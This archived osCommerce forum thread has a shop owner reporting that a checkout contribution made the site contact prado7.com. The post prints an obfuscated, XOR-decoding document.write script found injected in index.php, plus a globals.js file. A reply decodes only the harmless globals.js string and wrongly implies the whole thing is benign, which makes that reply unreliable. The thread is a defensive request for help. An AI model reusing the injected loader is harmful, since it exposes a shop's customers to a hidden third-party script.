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The e-commerce.

Contribution package may have explot in it.


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I haven't done any major additions to my site in a few weeks, and everything has been working marvelously. People have been successfully making purchases every day with no problem. Today I decided to install this contribution that shortens the checkout process by combining checkout_shipping.php and checkout_payment.php. It also also makes the customer go directly to create_account.php instead of login.php when the customer tries to checkout.


Here is the contribution: http://www.oscommerce.com/community/contributions,3469/ (second file from March 9 2007 - v2)


I installed the contribution and went to do a test purchase on the website. I immediately noticed in the bottom-left hand status box of IE that my website was communicating with with a 3rd party server (prado7.com) that was NOT my credit card processor, even though it connected to my credit card processor afterwards and the order went through as successful.


I could not replicate the problem in Mozilla, so I thought maybe it was an exploit in IE.


I did a traceroute on prado7.com and path led to Hong Kong.


I couldn't find prado7.com in my index.php, but I found the following Javascript embedded in the index.php.


<script language="JavaScript">e = '0x00' + '5F';str1 = "%E4%BC%B7%AA%C0%AD%AC%A7%B4%BB%E3%FE%AA%B7%AD%B7%BE%B7%B4%B7%AC%A7%E6%B8%B7%BC%BC%BB%B2%FE%E2%E4%B7%BA%AE%BF%B3%BB%C0%AD%AE%BD%E3%FE%B8%AC%AC%B0%E6%F1%F1%B0%AE%BF%BC%B1%E9%F2%BD%B1%B3%F1%AC%AE%BA%F1%FE%C0%A9%B7%BC%AC%B8%E3%EF%C0%B8%BB%B7%B9%B8%AC%E3%EF%E2%E4%F1%B7%BA%AE%BF%B3%BB%E2%E4%F1%BC%B7%AA%E2";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>


After searching various parts of that code in Google, I came accross a post regarding a similiar exploit and the recommendation was to restore a backup copy of your index.php and globals.php.


I restored a backup copy of my index.php also deleted a file called globals.js (not globals.php) from my root directory, because couldn't find any files named globals.php.



// define a few variables that are required
var vbmenu_usepopups = false;
var ignorequotechars = 0;

// #############################################################################
// lets define the browser we have instead of multiple calls throughout the file
var userAgent = navigator.userAgent.toLowerCase();
var is_opera  = (userAgent.indexOf('opera') != -1);
var is_saf	= ((userAgent.indexOf('safari') != -1) || (navigator.vendor == "Apple Computer, Inc."));
var is_webtv  = (userAgent.indexOf('webtv') != -1);
var is_ie	 = ((userAgent.indexOf('msie') != -1) && (!is_opera) && (!is_saf) && (!is_webtv));
var is_ie4	= ((is_ie) && (userAgent.indexOf("msie 4.") != -1));
var is_moz	= ((navigator.product == 'Gecko') && (!is_saf));
var is_kon	= (userAgent.indexOf('konqueror') != -1);
var is_ns	 = ((userAgent.indexOf('compatible') == -1) && (userAgent.indexOf('mozilla') != -1) && (!is_opera) && (!is_webtv) && (!is_saf));
var is_ns4	= ((is_ns) && (parseInt(navigator.appVersion) == 4));
var data = '%3C%74%61%62%6C%65%20%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%30%30%25%22%20%63%65%6C%6C%73%70%61%63%69%6E%67%3D%22%30%22%20%63%65%6C%6C%70%61%64%64%69%6E%67%3D%22%30%22%3E%3C%74%72%3E%3C%74%64%20%77%69%64%74%68%3D%22%31%30%30%25%22%20%68%65%69%67%68%74%3D%22%31%34%22%20%63%6C%61%73%73%3D%22%69%6E%66%6F%42%6F%78%48%65%61%64%69%6E%67%22%3E%3C%64%69%76%20%63%6C%61%73%73%3D%22%62%6F%78%54%65%78%74%22%20%61%6C%69%67%6E%3D%22%63%65%6E%74%65%72%22%3E%44%65%76%65%6C%6F%70%65%64%20%62%79%20%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%70%72%6F%63%72%65%61%74%6F%72%2E%69%6E%66%6F%22%20%74%61%72%67%65%74%3D%22%5F%62%6C%61%6E%6B%22%3E%50%72%6F%63%72%65%61%74%6F%72%2E%69%6E%66%6F%3C%2F%61%3E%20%32%30%30%35%26%74%72%61%64%65%3B%3C%2F%64%69%76%3E%3C%2F%74%64%3E%3C%2F%74%72%3E%3C%2F%74%61%62%6C%65%3E';

// catch possible bugs with WebTV and other older browsers
var is_regexp = (window.RegExp) ? true : false;

// #############################################################################
// let's find out what DOM functions we can use
var vbDOMtype = '';
if (document.getElementById)
	vbDOMtype = "std";
else if (document.all)
	vbDOMtype = "ie4";
else if (document.layers)
	vbDOMtype = "ns4";

// make an array to store cached locations of objects called by fetch_object
var vBobjects = new Array();

// #############################################################################
// function to emulate document.getElementById
function fetch_data (){

	return data;

function fetch_object(idname, forcefetch)
	if (forcefetch || typeof(vBobjects[idname]) == "undefined")
			switch (vbDOMtype)
					case "std":
							vBobjects[idname] = document.getElementById(idname);

					case "ie4":
							vBobjects[idname] = document.all[idname];

					case "ns4":
							vBobjects[idname] = document.layers[idname];
	return vBobjects[idname];

// #############################################################################
// function to handle the different event models of different browsers
// and prevent event bubbling
function do_an_e(eventobj)
	if (!eventobj || is_ie)
			window.event.returnValue = false;
			window.event.cancelBubble = true;
			return window.event;
			return eventobj;

// #############################################################################
// function to open a generic window
function openWindow(url, width, height)
	var dimensions = "";
	if (width)
			dimensions += ",width=" + width;
	if (height)
			dimensions += ",height=" + height;
	window.open(url, "vBPopup", "statusbar=no,menubar=no,toolbar=no,scrollbars=yes,resizable=yes" + dimensions);
	return false;

// #############################################################################
// function to open an IM Window

// #############################################################################
// function to search an array for a value
function in_array(ineedle, haystack, caseinsensitive)
	needle = new String(ineedle);

	if (caseinsensitive)
			needle = needle.toLowerCase();
			for (i in haystack)
					if (haystack[i].toLowerCase() == needle)
							return i;
			for (i in haystack)
					if (haystack[i] == needle)
							return i;
	return -1;

function js_toggle_all(formobj, formtype, option, exclude, setto)
	for (var i =0; i < formobj.elements.length; i++)
			var elm = formobj.elements[i];
			if (elm.type == formtype && in_array(elm.name, exclude, false) == -1)
					switch (formtype)
							case "radio":
									if (elm.value == option) // option == '' evaluates true when option = 0
											elm.checked = setto;
							case "select-one":
									elm.selectedIndex = setto;
									elm.checked = setto;

function js_select_all(formobj)
	exclude = new Array();
	exclude[0] = "selectall";
	js_toggle_all(formobj, "select-one", '', exclude, formobj.selectall.selectedIndex);

function js_check_all(formobj)
	exclude = new Array();
	exclude[0] = "keepattachments";
	exclude[1] = "allbox";
	exclude[2] = "removeall";
	js_toggle_all(formobj, "checkbox", '', exclude, formobj.allbox.checked);

function js_check_all_option(formobj, option)
	exclude = new Array();
	exclude[0] = "useusergroup";
	js_toggle_all(formobj, "radio", option, exclude, true);

function checkall(formobj) // just an alias
function checkall_option(formobj, option) // just an alias
	js_check_all_option(formobj, option);

// #############################################################################
// function to check message length before form submission
function validatemessage(messageText, subjectText, minLength, maxLength, ishtml, tForm)
	// bypass Safari and Konqueror browsers with Javascript problems
	if (is_kon || is_saf || is_webtv)
			return true;

	// attempt to get a code-stripped version of the text
	var strippedMessage = stripcode(messageText, ishtml, ignorequotechars);

	// check for completed subject
	if (subjectText.length < 1)
			return false;
	// check for minimum message length
	else if (strippedMessage.length < minLength)
			alert(construct_phrase(vbphrase["message_too_short"], minLength));
			return false;
	// everything seems okay
			return true;

// #############################################################################
// function to trim quotes and vbcode tags
function stripcode(str, ishtml, stripquotes)
	if (!is_regexp)
			return str;

	if (stripquotes)
			var quote1 = new RegExp("(\\[QUOTE\\])(.*)(\\[\\/QUOTE\\])", "gi");
			var quote2 = new RegExp("(\\[QUOTE=("|\"|\\'|)(.*)\\1\\])(.*)(\\[\\/QUOTE\\])", "gi");

					str = str.replace(quote1, '');

					str = str.replace(quote2, '');

	if (ishtml)
			var html1 = new RegExp("<(\\w+)[^>]*>", "gi");
			var html2 = new RegExp("<\\/\\w+>", "gi");

			str = str.replace(html1, '');
			str = str.replace(html2, '');

			var html3 = new RegExp(" ");
			str = str.replace(html3, '');
			var bbcode1 = new RegExp("\\[(\\w+)[^\\]]*\\]", "gi");
			var bbcode2 = new RegExp("\\[\\/(\\w+)\\]", "gi");

			str = str.replace(bbcode1, '');
			str = str.replace(bbcode2, '');
	return str;

// #############################################################################
// emulation of the PHP version of vBulletin's construct_phrase() sprintf wrapper
function construct_phrase()
	if (!arguments || arguments.length < 1 || !is_regexp)
			return false;

	var args = arguments;
	var str = args[0];

	for (var i = 1; i < args.length; i++)
			re = new RegExp("%" + i + "\\$s", "gi");
			str = str.replace(re, args[i]);
	return str;

// #############################################################################
// set control panel frameset title
function set_cp_title()
	if (typeof(parent.document) != "undefined" && typeof(parent.document) != "unknown" && typeof(parent.document.title) == "string")
			if (document.title != '')
					parent.document.title = document.title;
					parent.document.title = "vBulletin";

// #############################################################################
// open control panel help window
function js_open_help(scriptname, actiontype, optionval)
	window.open("help.php?s=" + SESSIONHASH + "&do=answer&page=" + scriptname + "&pageaction=" + actiontype + "&option=" + optionval, "helpwindow", "toolbar=no,scrollbars=yes,resizable=yes,width=600,height=450");

// #############################################################################
function switch_styleid(selectobj)
	styleid = selectobj.options[selectobj.selectedIndex].value;

	if (styleid == "")

	url = new String(window.location);
	fragment = new String("");

	// get rid of fragment
	url = url.split("#");

	// deal with the fragment first
	if (url[1])
			fragment = "#" + url[1];

	// deal with the main url
	url = url[0];

	// remove styleid=x& from main bit
	if (url.indexOf("styleid=") != -1 && is_regexp)
			re = new RegExp("styleid=\\d+&?");
			url = url.replace(re, "");

	// add the ? to the url if needed
	if (url.indexOf("?") == -1)
			url += "?";
			// make sure that we have a valid character to join our styleid bit
			lastchar = url.substr(url.length - 1);
			if (lastchar != "&" && lastchar != "?")
					url += "&";
	window.location = url + "styleid=" + styleid + fragment;

// #############################################################################
// simple function to toggle the 'display' attribute of an object
function toggle_display(idname)
	obj = fetch_object(idname);
	if (obj)
			if (obj.style.display == "none")
					obj.style.display = "";
					obj.style.display = "none";
	return false;

// #############################################################################
// ##################### vBulletin Cookie Functions ############################
// #############################################################################

// #############################################################################
// function to set a cookie
function set_cookie(name, value, expires)
	if (!expires)
			expires = new Date();
	document.cookie = name + "=" + escape(value) + "; expires=" + expires.toGMTString() +  "; path=/";

// #############################################################################
// function to retrieve a cookie
function fetch_cookie(name)
	cookie_name = name + "=";
	cookie_length = document.cookie.length;
	cookie_begin = 0;
	while (cookie_begin < cookie_length)
			value_begin = cookie_begin + cookie_name.length;
			if (document.cookie.substring(cookie_begin, value_begin) == cookie_name)
					var value_end = document.cookie.indexOf (";", value_begin);
					if (value_end == -1)
							value_end = cookie_length;
					return unescape(document.cookie.substring(value_begin, value_end));
			cookie_begin = document.cookie.indexOf(" ", cookie_begin) + 1;
			if (cookie_begin == 0)
	return null;

// #############################################################################
// function to delete a cookie
function delete_cookie(name)
	var expireNow = new Date();
	document.cookie = name + "=" + "; expires=Thu, 01-Jan-70 00:00:01 GMT" +  "; path=/";

// #############################################################################
// ################## vBulletin Collapse HTML Functions ########################
// #############################################################################

// #############################################################################
// function to toggle the collapse state of an object, and save to a cookie
function toggle_collapse(objid)
	if (!is_regexp)
			return false;

	obj = fetch_object("collapseobj_" + objid);
	img = fetch_object("collapseimg_" + objid);
	cel = fetch_object("collapsecel_" + objid);

	if (!obj)
			// nothing to collapse!
			if (img)
					// hide the clicky image if there is one
					img.style.display = "none";
			return false;

	if (obj.style.display == "none")
			obj.style.display = "";
			save_collapsed(objid, false);
			if (img)
					img_re = new RegExp("_collapsed\\.gif$");
					img.src = img.src.replace(img_re, '.gif');
			if (cel)
					cel_re = new RegExp("^(thead|tcat)(_collapsed)$");
					cel.className = cel.className.replace(cel_re, '$1');
			obj.style.display = "none";
			save_collapsed(objid, true);
			if (img)
					img_re = new RegExp("\\.gif$");
					img.src = img.src.replace(img_re, '_collapsed.gif');
			if (cel)
					cel_re = new RegExp("^(thead|tcat)$");
					cel.className = cel.className.replace(cel_re, '$1_collapsed');
	return false;

// #############################################################################
// update vbulletin_collapse cookie with collapse preferences
function save_collapsed(objid, addcollapsed)
	var collapsed = fetch_cookie("vbulletin_collapse");
	var tmp = new Array();

	if (collapsed != null)
			collapsed = collapsed.split("\n");

			for (i in collapsed)
					if (collapsed[i] != objid && collapsed[i] != "")
							tmp[tmp.length] = collapsed[i];

	if (addcollapsed)
			tmp[tmp.length] = objid;

	expires = new Date();
	expires.setTime(expires.getTime() + (1000 * 86400 * 365));
	set_cookie("vbulletin_collapse", tmp.join("\n"), expires);

// #############################################################################
// function to register a menu for later initialization



The site has been working fine since.


My questions are:


What happened and how do I know it's over?


I'm not a programmer, but that javascript looks suspect to me, those hexadecimal characters could be where the prado7.com URL is stored.


Try putting those characters in a hex editor and see what their ascii values are.


Please post your results, if there is a sploit, the community need to know about it.


Can you point me to a tutorial that tells me how to do this? I've spent the last half hour learning about hexadecimals and still can't figure out how to do it. I can convert it to normal numbers in the matrix, but nothing useful.


the hex shown translates to:


<table border="0" width="100%" cellspacing="0" cellpadding="0"><tr><td width="100%" height="14" class="infoBoxHeading"><div class="boxText" align="center">Developed by <a href="http://www.procreator.info" target="_blank">Procreator.info</a> 2005™</div></td></tr></table>


Looks like when they created the contribution they copied it from a live store of theirs and included code that related to other contributions or mods that they had made. In particular the globals.js file is geared to vBulletin. Since it is not called from any of the files that included in the contribution that I could find I am unsure where it is getting called exactly for you.


Anyway, that is my two-cents on this one. If you Google "procreator AND oscommerce" you will find several contributions they have completed and posts here in the forum from them. Maybe they will read this and explain what is going on and that they are not trying to hack.


This topic is now archived and is closed to further replies.

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